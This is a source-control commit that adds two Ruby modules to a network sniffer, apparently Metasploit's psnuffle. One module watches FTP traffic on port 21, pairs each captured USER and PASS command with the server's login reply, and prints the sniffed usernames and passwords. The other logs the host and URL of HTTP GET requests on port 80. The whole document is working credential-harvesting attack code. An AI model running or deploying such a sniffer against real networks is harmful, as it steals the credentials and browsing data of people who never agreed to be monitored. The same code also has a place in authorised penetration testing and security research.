Psnuffle modules

git-svn-id: file:///home/svn/framework3/trunk@6824 4d416f70-5f16-0410-b530-b9f4589650da

data/exploits/psnuffle/ftp.rb

@@ -0,0 +1,70 @@
+# Sniffer class for ftp
+class SnifferFTP < BaseProtocolParser
+	def register_sigs
+		self.sigs = { 
+			:banner	      => /^(220\s*[^\r\n]+)/si,
+			:user		  => /^USER\s+([^\s]+)/si,
+			:pass		  => /^PASS\s+([^\s]+)/si,
+			:login_pass   => /^(230\s*[^\n]+)/si,
+			:login_fail   => /^(530\s*[^\n]+)/si,
+		}
+	end
+
+	def parse(pkt)
+
+		# We want to return immediatly if we do not have a packet which is handled by us
+		return if not pkt[:tcp]
+		return if (pkt[:tcp].src_port != 21 and pkt[:tcp].dst_port != 21)
+	
+		# Ok it's a packet for us lets look fot the matching session
+		if (pkt[:tcp].dst_port == 21) # When command to server 
+			s = find_session("#{pkt[:ip].dst_ip}:#{pkt[:tcp].dst_port}-#{pkt[:ip].src_ip}:#{pkt[:tcp].src_port}","#{pkt[:ip].dst_ip}")
+		else                          # When command from server (session is based on server ip and port only)
+			s = find_session("#{pkt[:ip].src_ip}:#{pkt[:tcp].src_port}-#{pkt[:ip].dst_ip}:#{pkt[:tcp].dst_port}","#{pkt[:ip].src_ip}")
+		end
+
+		self.sigs.each_key do |k|
+			# There is only one pattern per run to test
+			matched = nil
+			matches = nil
+
+			if(pkt[:tcp].payload =~ self.sigs[k])
+				matched = k
+				matches = $1
+			end
+
+			case matched
+			when :login_pass
+				if(s[:user] and s[:pass])
+					print "-> FTP password sniffed: #{s[:session]} >> username:#{s[:user]} password:#{s[:pass]} Server Welcome Banner:#{s[:banner]}\n"
+
+					# Report into DB when possible - is prepared but now used right now have to check why it does not work
+					#reporthash=Hash.new
+					#reporthash[:user]=s[:user]
+					#reporthash[:pass]=s[:pass]
+					#reporthash[:targ_host]=s[:host]
+					#reporthash[:targ_port]=21
+					#reporthash[:port]=21
+					#reporthash[:host]=s[:host]
+					#reporthash[:extra]="Server Welcome Banner: #{s[:banner]}" 
+					#reporthash[:proto]="FTP"
+					#report_auth_info(reporthash)
+
+					# Remove it form the session objects so freeup
+					sessions.delete(s[:session])
+
+					return 
+				end
+			when :banner
+				# Because some ftp server send multiple banner we take only the first one and ignore the rest 
+				if not (s[:banner])
+					sessions[s[:session]].merge!({k => matches})
+				end
+			when nil
+				# No matches, no saved state
+			else
+				sessions[s[:session]].merge!({k => matches})
+			end # end case matched
+		end # end of each_key
+	end # end of parse
+end

data/exploits/psnuffle/url.rb

@@ -0,0 +1,45 @@
+# Sniffer class for GET URL's
+class SnifferURL < BaseProtocolParser
+	def register_sigs
+		self.sigs = { 
+			:get	 => /^GET\s+([^\n]+)\s+HTTP\/\d\.\d/si,
+			:host	 => /^Host\:\s+([^\n]+)/si
+		}
+	end
+
+	def parse(pkt)
+		# We want to return immediantly if  we do not have a packet which is handled by us
+		return if not pkt[:tcp]
+		return if (pkt[:tcp].dst_port != 80)
+
+		# Ok it's a packet for us lets look fot the matching session
+		s = find_session("#{pkt[:ip].dst_ip}:#{pkt[:tcp].dst_port}-#{pkt[:ip].src_ip}:#{pkt[:tcp].src_port}","#{pkt[:ip].dst_ip}")
+
+		self.sigs.each_key do |k|
+		
+			# There is only one pattern per run to test
+			matched = nil
+			matches = nil
+
+			if(pkt[:tcp].payload =~ self.sigs[k])
+				matched = k
+				matches = $1
+			end
+
+			case matched
+			when :host
+				if(s[:get])
+					print "-> Get request sniffed: #{s[:host]}#{s[:get]}\n"
+					sessions.delete(s[:session])
+					return 
+				end
+			when nil
+				# No matches, no saved state
+			else
+				sessions[s[:session]].merge!({k => matches})
+			end # end case matched
+		
+		end # end of each_key
+
+	end # end of parse
+end # end of URL sniffer